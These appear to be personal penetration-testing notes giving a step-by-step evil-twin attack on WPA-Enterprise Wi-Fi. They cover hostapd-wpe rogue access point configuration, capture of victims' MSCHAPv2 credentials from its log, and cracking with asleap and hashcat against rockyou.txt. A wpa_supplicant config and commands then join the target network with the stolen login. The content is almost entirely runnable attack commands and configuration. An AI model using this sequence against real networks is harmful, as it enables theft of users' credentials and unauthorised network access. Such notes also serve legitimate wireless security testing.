WPA-E (hostapd)

Capture the cert first using monitor mode:

using wireshark then filter the certificate:

tls.handshake.certificate

Don't forget to kill all wifi usage first

sudo airmon-ng check kill

Make sure know the target SSID, this technique seems to be an Evil-Twin attack of the wifi access point.

change file in /etc/hostapd-wpe/hostapd-wpe.conf

# Configuration file for hostapd-wpe

# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan1

# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# 802.11 Options
ssid=hostapd-wpe
channel=1
[snip]

Run Evil Twin:

sudo ./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

After victim input username and password:

image from https://wirelessdefence.co.uk/hostapd-wpe/

or check the log:

cat /var/log/hostapd-wpe.log

Then crack the password with rockyou.txt:

asleap -C <Challenge> -R <Response> -W /usr/share/wordlist/rockyou.txt

alternatively using hashcat:

hashcat -m 5500 ./hash_wifi.txt /usr/share/wordlist/rockyou.txt

you need to use asleap v2.2

ref:

https://wirelessdefence.co.uk/hostapd-wpe/

War RoomWar Room

---

After got the password and the username connect with terminal:

create config file connect_wpa-e.conf

    network={
            scan_ssid=1
            eap=PEAP
            ssid="<TARGET-NAME>"
            key_mgmt=WPA-EAP
            identity="<DOMAIN\USERNAME>"
            password="<PASSWORD>"
            phase1="peaplabel=0"
            phase2="auth=MSCHAPV2"
    }
    

Then connect with wpa-supplicant:

sudo wpa_supplicant -B -i wlan0 -c ./connect_wpa-e.conf

Obtain an IP Address:

sudo dhclient wlan0